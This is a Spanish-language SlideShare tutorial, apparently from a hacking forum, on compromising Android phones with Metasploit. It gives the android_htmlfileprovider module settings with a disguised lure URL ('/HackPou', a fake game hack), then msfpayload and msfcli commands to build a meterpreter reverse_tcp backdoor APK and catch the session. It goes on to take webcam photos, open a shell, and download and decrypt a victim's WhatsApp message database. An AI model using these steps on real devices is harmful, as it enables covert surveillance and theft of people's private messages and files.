SlideShare una empresa de Scribd logo
PENTEST & Support
Gathering en Android y Backdoor [Con Metasploit]
Por J0K3$/Icebreaker
Nivel de Paper = Básico
Gathering: Robo de Archivo en Android [Metasploit]
Hola!
En esta parte del paper explicaremos como conseguir información del Android,
primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno
una vez cargado usaremos el siguiente “Auxiliar” :
use auxiliary/gather/android_htmlfileprovider
Ya vieron una vez cargado , pueden hacer un “show options” , si quieren , bueno
ahora lo que tenemos que hacer es indicarles el archivo a robar de android, para eso
os dejo acá una lista de los path de los directorios , para mi , interesantes.....
Bueno en mi casó no cogeré ninguna de esas cogeré, otras pues usare mi maquina
virtual para , que no me demore mucho tiempo , pero pueden usar una de esas, por si
les interesa algún directorio en especial , Ok?! Empecemos acá les dejo una foto de
mi configuración y ahora les explicare punto por punto para que es cada.
Bueno, expliquemos esto por partes....
Files = Esté sera el archivo que robaran de android, me explico? El path …..en mi
caso será hosts.
URIPATH= Le coloqué este “/” es lo que ira detrás de la ip, pueden poner algo así
para la ing social, por ejemplo /HackPou ...por ejemplo ese supuesto hack para el
juego y saldria así : “Ip”/HackPou
SRVPORT= Al principio saldría 8080 pero para no darle el puerto ese pues la
dirección quedaría así al entregársela a la víctima “ip”:8080/HackPou , pues les
extrañaría aunque también hay shorten , pero lo podrían ver en la barrita de arriba al
ejecutarlo...Entonces déjenlo como 80 y no se visualizara [Porque es protocolo
HTTP]....
Bueno le daremos la dirección que nos da para los ataques locales la de Local Ip ,
osease le daré esa ip haber que me muestra el exploit GO! .
Bueno, acá ven eso es la ip local , de el dispositivo atacado , y su versión de android
+ modelo del dispositivo ¿No está mal ? Eh ...Bueno este ataque es muy bueno , con
una combinación que diré al final ….. Pero pasémonos a la otra parte del paper no?
….¿Tienen miedo?
Backdoor en Android. Tomando el Control del dispositivo.
[Metasploit]
Bueno en esté punto dirán ! ¿Enserio? Se puede penetrar mi android, de una forma
sencilla...saltándose antivirus …..Pues si, primero actualicen metasploit si llevan
tiempo sin hacerlo , pues salieron algunos módulos nuevos bueno , pasemos a la
acción primero dentro de la consola de metasploit colocaremos esto ….
search android
Bueno verán los siguientes módulos.....
O sí! Am sacado un exploit handler, y 2 payloads...mmm.... saquemos un APK
infectada ¿No? Claro....bueno como creamos este apk? Pues fácil con msfpayload ,
yo lo creare de Meterpreter, por si no lo saben meterpreter es el “Troyano” de
metasploit ,con funciones interesantes. Para crearlo abrimos una terminal y ponemos
lo siguiente.....
sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=”Ip local o
Externa” R > “Ruta+Archivo.apk”
Ejemplo:
sudo msfpayload payload/android/meterpreter/reverse_tcp
LHOST=192.168.1.35 R > /home/icebreaker/Escritorio/HackPou.apk
Bueno , dirán si han hecho “backdoors” para metasploit , ! J0k3$ J0k3$ ! , por qué
pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a
msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin
formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden
comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien
escrito....Bueno una vez hecho eso, cargamos el exploit …...
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp
LHOST=”Su ip puesta en el backdoor” E
ejemplo:
sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp
LHOST=”Su ip puesta en el backdoor” E
Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto....
O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para
ver los comandos que nos brinda Meterpreter ,para esté dispositivo.
Uo! cuantos comandos! Probemos alguno como ...”Sysinfo”.....
Mmmm ! Buena información , probemos ….Webcam_Snap....Esté es para echar una
foto con el teléfono infectado.....
No sé ve muy bien xD jajaj pero bueno, es la cámara de mi móvil...XD jajajajaj , y
como vieron antes jajaja no es muy bueno ni nuevo...XD jajajja....Bueno probemos
shell....Esté es mi comando preferido....
O sí! , que bonitos directorios del android infectado …..bueno entremos en sdcard
haber que encontramos....
Oh! hemos encontrado el directorio de WhatsApp.....Salgamos y movamos con
meterpreter hacia este directorio para descargarnos algo....
Bueno bueno, les explico lo que uso en la imagén para moverme....son estos 2
comandos...
pwd = Es para ver en que directorio empezamos inicialmente....
cd = para avanzar o retroceder [Parar retroceder sería así :” cd .. “]
entramos en alguna carpeta como podria ser Databases, y descargamos el archivo de
la database llamado : “msgstore.db.crypt” , bueno ese archivo tiene las
conversaciones de whatsapp también podrían descargar imágenes...etc de todo ,
después de descargarlo usen algo como un whatsapp decripter y desencripten las
conversaciones para leerlas...ya are un paper de como se hacen ….
Saludos y que les allá servido de algo.
Gracias a Pentest And Support , especialmente gracias a David Urióstegui.

Más contenido relacionado

La actualidad más candente

Práctica de calculadora documentada
Práctica de calculadora documentadaPráctica de calculadora documentada
Práctica de calculadora documentada
Tochis
 
Primero quiero que entiendas algo
Primero quiero que entiendas algoPrimero quiero que entiendas algo
Primero quiero que entiendas algo
Andrea Paz
 
Uso de Excepciones en JAVA
Uso de Excepciones en JAVAUso de Excepciones en JAVA
Uso de Excepciones en JAVA
innovalabcun
 
Manual de Lenguaje Batch
Manual de Lenguaje BatchManual de Lenguaje Batch
Manual de Lenguaje BatchMauricio Melo
 
Destructores
Destructores Destructores
Destructores
Diego Ramon Sanchez
 
PROBLEMAS CON EL PC
PROBLEMAS CON EL PCPROBLEMAS CON EL PC
PROBLEMAS CON EL PC
conillet
 
Problemas con el ordenador
Problemas con el ordenadorProblemas con el ordenador
Problemas con el ordenador
centrowebs
 
Computer Problems Ra
Computer Problems RaComputer Problems Ra
Computer Problems RaUlises Isaza
 
Problemas Con El Ordenador
Problemas Con El OrdenadorProblemas Con El Ordenador
Problemas Con El OrdenadorEl Ojo Kanalla .
 
Computer Problems Ra
Computer Problems RaComputer Problems Ra
Computer Problems Ra
guestcf37ef
 

La actualidad más candente (12)

Práctica de calculadora documentada
Práctica de calculadora documentadaPráctica de calculadora documentada
Práctica de calculadora documentada
 
Primero quiero que entiendas algo
Primero quiero que entiendas algoPrimero quiero que entiendas algo
Primero quiero que entiendas algo
 
Uso de Excepciones en JAVA
Uso de Excepciones en JAVAUso de Excepciones en JAVA
Uso de Excepciones en JAVA
 
Manual de Lenguaje Batch
Manual de Lenguaje BatchManual de Lenguaje Batch
Manual de Lenguaje Batch
 
Destructores
Destructores Destructores
Destructores
 
Ataque kali
Ataque kaliAtaque kali
Ataque kali
 
Problemas con el_ordenador
Problemas con el_ordenadorProblemas con el_ordenador
Problemas con el_ordenador
 
PROBLEMAS CON EL PC
PROBLEMAS CON EL PCPROBLEMAS CON EL PC
PROBLEMAS CON EL PC
 
Problemas con el ordenador
Problemas con el ordenadorProblemas con el ordenador
Problemas con el ordenador
 
Computer Problems Ra
Computer Problems RaComputer Problems Ra
Computer Problems Ra
 
Problemas Con El Ordenador
Problemas Con El OrdenadorProblemas Con El Ordenador
Problemas Con El Ordenador
 
Computer Problems Ra
Computer Problems RaComputer Problems Ra
Computer Problems Ra
 

Similar a Android

Introduccion a maratis con c++
Introduccion a maratis con c++Introduccion a maratis con c++
Introduccion a maratis con c++
Gerardo Rivera Lopez
 
Wifislax4.10.1
Wifislax4.10.1Wifislax4.10.1
Wifislax4.10.1
herson1994
 
Tutorial
TutorialTutorial
Tutorial
elidetjc
 
Como desinfectar y proteger tu memoria usb de virus
Como desinfectar y proteger tu memoria usb de virusComo desinfectar y proteger tu memoria usb de virus
Como desinfectar y proteger tu memoria usb de virus
villxs
 
Tutorial Android 1
Tutorial Android 1Tutorial Android 1
Tutorial Android 1
newimagenio
 
Introduccion al hacking con SET.
Introduccion al hacking con SET.Introduccion al hacking con SET.
Introduccion al hacking con SET.
Michael Sanchez
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Telefónica
 
Programación en Android 1 capítulo. Introducción
Programación en Android 1 capítulo. IntroducciónProgramación en Android 1 capítulo. Introducción
Programación en Android 1 capítulo. Introducción
Horacio Maldonado Sea
 
Pocket Edition
 Pocket Edition  Pocket Edition
Pocket Edition
devilishpraise794
 
Ingeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo iiIngeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo iiFreelance
 
Solucion reto mr robot
Solucion reto mr robotSolucion reto mr robot
Solucion reto mr robot
Roberto Garcia Amoriz
 
Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018
Matías Moreno Cárdenas
 
Virtual box+tutorial -vagonetta-tk--.unlocked
Virtual box+tutorial -vagonetta-tk--.unlockedVirtual box+tutorial -vagonetta-tk--.unlocked
Virtual box+tutorial -vagonetta-tk--.unlockedPablo Villavicencio
 
Clase9 (consola linux)
Clase9 (consola linux)Clase9 (consola linux)
Clase9 (consola linux)
Miguel Eduardo Luces
 
Hack Crack Bindear
Hack  Crack BindearHack  Crack Bindear
Hack Crack BindearHxC Store
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Telefónica
 
Que es action scrip 3
Que es  action scrip 3Que es  action scrip 3
Que es action scrip 3Harolsmr1103
 
Dispositivo virtual de eclipse
Dispositivo virtual de eclipseDispositivo virtual de eclipse
Dispositivo virtual de eclipse
Leonardo Torres
 

Similar a Android (20)

Introduccion a maratis con c++
Introduccion a maratis con c++Introduccion a maratis con c++
Introduccion a maratis con c++
 
Wifislax4.10.1
Wifislax4.10.1Wifislax4.10.1
Wifislax4.10.1
 
Tutorial
TutorialTutorial
Tutorial
 
Como desinfectar y proteger tu memoria usb de virus
Como desinfectar y proteger tu memoria usb de virusComo desinfectar y proteger tu memoria usb de virus
Como desinfectar y proteger tu memoria usb de virus
 
Tutorial Android 1
Tutorial Android 1Tutorial Android 1
Tutorial Android 1
 
Introduccion al hacking con SET.
Introduccion al hacking con SET.Introduccion al hacking con SET.
Introduccion al hacking con SET.
 
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
Explotar Eternalblue & Doublepulsar para obener una shell de Empire/Meterpret...
 
Programación en Android 1 capítulo. Introducción
Programación en Android 1 capítulo. IntroducciónProgramación en Android 1 capítulo. Introducción
Programación en Android 1 capítulo. Introducción
 
Pocket Edition
 Pocket Edition  Pocket Edition
Pocket Edition
 
Ingeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo iiIngeniería inversa básica en android tomo ii
Ingeniería inversa básica en android tomo ii
 
Solucion reto mr robot
Solucion reto mr robotSolucion reto mr robot
Solucion reto mr robot
 
Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018Comprometiendo dispositivos con software legal - H-C0N 2018
Comprometiendo dispositivos con software legal - H-C0N 2018
 
Virtual box+tutorial -vagonetta-tk--.unlocked
Virtual box+tutorial -vagonetta-tk--.unlockedVirtual box+tutorial -vagonetta-tk--.unlocked
Virtual box+tutorial -vagonetta-tk--.unlocked
 
Wifislax tutorial
Wifislax tutorial Wifislax tutorial
Wifislax tutorial
 
Clase9 (consola linux)
Clase9 (consola linux)Clase9 (consola linux)
Clase9 (consola linux)
 
Hack Crack Bindear
Hack  Crack BindearHack  Crack Bindear
Hack Crack Bindear
 
Hack x crack_bindear
Hack x crack_bindearHack x crack_bindear
Hack x crack_bindear
 
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
Cómo explotar EternalRomance & EternalSynergy en Windows Server 2016
 
Que es action scrip 3
Que es  action scrip 3Que es  action scrip 3
Que es action scrip 3
 
Dispositivo virtual de eclipse
Dispositivo virtual de eclipseDispositivo virtual de eclipse
Dispositivo virtual de eclipse
 

Más de Marvin Arteaga

Guia plagasfrijol
Guia plagasfrijolGuia plagasfrijol
Guia plagasfrijol
Marvin Arteaga
 
PAN DE COCO AGROINDUSTRAI
PAN DE COCO AGROINDUSTRAIPAN DE COCO AGROINDUSTRAI
PAN DE COCO AGROINDUSTRAI
Marvin Arteaga
 
TIPOS DE CONTROL Y LOS MECANISMOS ESPICIFICOS DE CONTROL
TIPOS DE CONTROL Y LOS MECANISMOS ESPICIFICOS DE CONTROLTIPOS DE CONTROL Y LOS MECANISMOS ESPICIFICOS DE CONTROL
TIPOS DE CONTROL Y LOS MECANISMOS ESPICIFICOS DE CONTROL
Marvin Arteaga
 
Desarrollo de-software-basado-en-reutilizacion
Desarrollo de-software-basado-en-reutilizacionDesarrollo de-software-basado-en-reutilizacion
Desarrollo de-software-basado-en-reutilizacion
Marvin Arteaga
 
Tema 1 arquitectura de von newman
Tema 1   arquitectura de von newmanTema 1   arquitectura de von newman
Tema 1 arquitectura de von newman
Marvin Arteaga
 
Manual de plagas de nicaragua
Manual de plagas de nicaraguaManual de plagas de nicaragua
Manual de plagas de nicaragua
Marvin Arteaga
 
7 formas de aliviar el estrés
7 formas de aliviar el estrés7 formas de aliviar el estrés
7 formas de aliviar el estrésMarvin Arteaga
 
1medicina cto - cardiologia y cirugia cardiovascular
1medicina   cto - cardiologia y cirugia cardiovascular1medicina   cto - cardiologia y cirugia cardiovascular
1medicina cto - cardiologia y cirugia cardiovascularMarvin Arteaga
 
Navega gratis con tu módem claro
Navega gratis con tu módem claroNavega gratis con tu módem claro
Navega gratis con tu módem claroMarvin Arteaga
 

Más de Marvin Arteaga (9)

Guia plagasfrijol
Guia plagasfrijolGuia plagasfrijol
Guia plagasfrijol
 
PAN DE COCO AGROINDUSTRAI
PAN DE COCO AGROINDUSTRAIPAN DE COCO AGROINDUSTRAI
PAN DE COCO AGROINDUSTRAI
 
TIPOS DE CONTROL Y LOS MECANISMOS ESPICIFICOS DE CONTROL
TIPOS DE CONTROL Y LOS MECANISMOS ESPICIFICOS DE CONTROLTIPOS DE CONTROL Y LOS MECANISMOS ESPICIFICOS DE CONTROL
TIPOS DE CONTROL Y LOS MECANISMOS ESPICIFICOS DE CONTROL
 
Desarrollo de-software-basado-en-reutilizacion
Desarrollo de-software-basado-en-reutilizacionDesarrollo de-software-basado-en-reutilizacion
Desarrollo de-software-basado-en-reutilizacion
 
Tema 1 arquitectura de von newman
Tema 1   arquitectura de von newmanTema 1   arquitectura de von newman
Tema 1 arquitectura de von newman
 
Manual de plagas de nicaragua
Manual de plagas de nicaraguaManual de plagas de nicaragua
Manual de plagas de nicaragua
 
7 formas de aliviar el estrés
7 formas de aliviar el estrés7 formas de aliviar el estrés
7 formas de aliviar el estrés
 
1medicina cto - cardiologia y cirugia cardiovascular
1medicina   cto - cardiologia y cirugia cardiovascular1medicina   cto - cardiologia y cirugia cardiovascular
1medicina cto - cardiologia y cirugia cardiovascular
 
Navega gratis con tu módem claro
Navega gratis con tu módem claroNavega gratis con tu módem claro
Navega gratis con tu módem claro
 

Último

fase 4-Estudio de la geometria analitica[1].pptx
fase 4-Estudio de la geometria analitica[1].pptxfase 4-Estudio de la geometria analitica[1].pptx
fase 4-Estudio de la geometria analitica[1].pptx
QuerubinOlayamedina
 
EduLearnIAappde IAparatodosdisponible.pptx
EduLearnIAappde IAparatodosdisponible.pptxEduLearnIAappde IAparatodosdisponible.pptx
EduLearnIAappde IAparatodosdisponible.pptx
Elizabeth Mejia
 
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_  conceptos b-sicos de programaci-n.pdfEstructuras b-sicas_  conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
edepjuanorozco
 
blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....
JosvilAngel
 
Clases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicosClases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicos
mcavero2019
 
Presentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivoPresentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivo
juanlemus11122
 
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIOFISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
DarwinNestorArapaQui
 
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASAEXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
Javier Lasa
 
Los derechos de autor y Ética Profesional
Los derechos de autor y Ética ProfesionalLos derechos de autor y Ética Profesional
Los derechos de autor y Ética Profesional
bgonzalezm20
 
Sistemas-de-Numeración-para-Primero-de-Secundaria.doc
Sistemas-de-Numeración-para-Primero-de-Secundaria.docSistemas-de-Numeración-para-Primero-de-Secundaria.doc
Sistemas-de-Numeración-para-Primero-de-Secundaria.doc
LuisEnriqueCarboneDe
 
estrategias de aprendizaje con ejemplos
estrategias de aprendizaje  con ejemplosestrategias de aprendizaje  con ejemplos
estrategias de aprendizaje con ejemplos
MarilinPaladines
 
WordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPressWordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPress
Fernando Tellado
 
ayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupalayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupal
jesusmedina766305
 

Último (13)

fase 4-Estudio de la geometria analitica[1].pptx
fase 4-Estudio de la geometria analitica[1].pptxfase 4-Estudio de la geometria analitica[1].pptx
fase 4-Estudio de la geometria analitica[1].pptx
 
EduLearnIAappde IAparatodosdisponible.pptx
EduLearnIAappde IAparatodosdisponible.pptxEduLearnIAappde IAparatodosdisponible.pptx
EduLearnIAappde IAparatodosdisponible.pptx
 
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_  conceptos b-sicos de programaci-n.pdfEstructuras b-sicas_  conceptos b-sicos de programaci-n.pdf
Estructuras b-sicas_ conceptos b-sicos de programaci-n.pdf
 
blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....blog.pdf de coceptos de personalidad....
blog.pdf de coceptos de personalidad....
 
Clases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicosClases de Informática primaria para niños de colegios católicos
Clases de Informática primaria para niños de colegios católicos
 
Presentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivoPresentación Arduino, proyecto colectivo
Presentación Arduino, proyecto colectivo
 
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIOFISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
FISICA IMPRIMIR MATERIAL ACADEMICO NIVEL SECUNDARIO
 
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASAEXPERIENCIA PROYECTOS STARTUP JAVIER LASA
EXPERIENCIA PROYECTOS STARTUP JAVIER LASA
 
Los derechos de autor y Ética Profesional
Los derechos de autor y Ética ProfesionalLos derechos de autor y Ética Profesional
Los derechos de autor y Ética Profesional
 
Sistemas-de-Numeración-para-Primero-de-Secundaria.doc
Sistemas-de-Numeración-para-Primero-de-Secundaria.docSistemas-de-Numeración-para-Primero-de-Secundaria.doc
Sistemas-de-Numeración-para-Primero-de-Secundaria.doc
 
estrategias de aprendizaje con ejemplos
estrategias de aprendizaje  con ejemplosestrategias de aprendizaje  con ejemplos
estrategias de aprendizaje con ejemplos
 
WordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPressWordPress training basics - básicos de cómo enseñar WordPress
WordPress training basics - básicos de cómo enseñar WordPress
 
ayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupalayuda en egresos exposición aps 1 grupal
ayuda en egresos exposición aps 1 grupal
 

Android

  • 1. PENTEST & Support Gathering en Android y Backdoor [Con Metasploit] Por J0K3$/Icebreaker Nivel de Paper = Básico Gathering: Robo de Archivo en Android [Metasploit] Hola! En esta parte del paper explicaremos como conseguir información del Android, primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno una vez cargado usaremos el siguiente “Auxiliar” : use auxiliary/gather/android_htmlfileprovider Ya vieron una vez cargado , pueden hacer un “show options” , si quieren , bueno ahora lo que tenemos que hacer es indicarles el archivo a robar de android, para eso os dejo acá una lista de los path de los directorios , para mi , interesantes.....
  • 2. Bueno en mi casó no cogeré ninguna de esas cogeré, otras pues usare mi maquina virtual para , que no me demore mucho tiempo , pero pueden usar una de esas, por si les interesa algún directorio en especial , Ok?! Empecemos acá les dejo una foto de mi configuración y ahora les explicare punto por punto para que es cada. Bueno, expliquemos esto por partes.... Files = Esté sera el archivo que robaran de android, me explico? El path …..en mi caso será hosts. URIPATH= Le coloqué este “/” es lo que ira detrás de la ip, pueden poner algo así para la ing social, por ejemplo /HackPou ...por ejemplo ese supuesto hack para el juego y saldria así : “Ip”/HackPou SRVPORT= Al principio saldría 8080 pero para no darle el puerto ese pues la dirección quedaría así al entregársela a la víctima “ip”:8080/HackPou , pues les extrañaría aunque también hay shorten , pero lo podrían ver en la barrita de arriba al ejecutarlo...Entonces déjenlo como 80 y no se visualizara [Porque es protocolo HTTP].... Bueno le daremos la dirección que nos da para los ataques locales la de Local Ip , osease le daré esa ip haber que me muestra el exploit GO! .
  • 3. Bueno, acá ven eso es la ip local , de el dispositivo atacado , y su versión de android + modelo del dispositivo ¿No está mal ? Eh ...Bueno este ataque es muy bueno , con una combinación que diré al final ….. Pero pasémonos a la otra parte del paper no? ….¿Tienen miedo? Backdoor en Android. Tomando el Control del dispositivo. [Metasploit] Bueno en esté punto dirán ! ¿Enserio? Se puede penetrar mi android, de una forma sencilla...saltándose antivirus …..Pues si, primero actualicen metasploit si llevan tiempo sin hacerlo , pues salieron algunos módulos nuevos bueno , pasemos a la acción primero dentro de la consola de metasploit colocaremos esto …. search android Bueno verán los siguientes módulos.....
  • 4. O sí! Am sacado un exploit handler, y 2 payloads...mmm.... saquemos un APK infectada ¿No? Claro....bueno como creamos este apk? Pues fácil con msfpayload , yo lo creare de Meterpreter, por si no lo saben meterpreter es el “Troyano” de metasploit ,con funciones interesantes. Para crearlo abrimos una terminal y ponemos lo siguiente..... sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=”Ip local o Externa” R > “Ruta+Archivo.apk” Ejemplo: sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=192.168.1.35 R > /home/icebreaker/Escritorio/HackPou.apk Bueno , dirán si han hecho “backdoors” para metasploit , ! J0k3$ J0k3$ ! , por qué pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien escrito....Bueno una vez hecho eso, cargamos el exploit …... sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E ejemplo: sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E
  • 5. Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto.... O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para ver los comandos que nos brinda Meterpreter ,para esté dispositivo.
  • 6. Uo! cuantos comandos! Probemos alguno como ...”Sysinfo”..... Mmmm ! Buena información , probemos ….Webcam_Snap....Esté es para echar una foto con el teléfono infectado.....
  • 7. No sé ve muy bien xD jajaj pero bueno, es la cámara de mi móvil...XD jajajajaj , y como vieron antes jajaja no es muy bueno ni nuevo...XD jajajja....Bueno probemos shell....Esté es mi comando preferido.... O sí! , que bonitos directorios del android infectado …..bueno entremos en sdcard haber que encontramos....
  • 8. Oh! hemos encontrado el directorio de WhatsApp.....Salgamos y movamos con meterpreter hacia este directorio para descargarnos algo.... Bueno bueno, les explico lo que uso en la imagén para moverme....son estos 2 comandos... pwd = Es para ver en que directorio empezamos inicialmente.... cd = para avanzar o retroceder [Parar retroceder sería así :” cd .. “] entramos en alguna carpeta como podria ser Databases, y descargamos el archivo de
  • 9. la database llamado : “msgstore.db.crypt” , bueno ese archivo tiene las conversaciones de whatsapp también podrían descargar imágenes...etc de todo , después de descargarlo usen algo como un whatsapp decripter y desencripten las conversaciones para leerlas...ya are un paper de como se hacen …. Saludos y que les allá servido de algo. Gracias a Pentest And Support , especialmente gracias a David Urióstegui.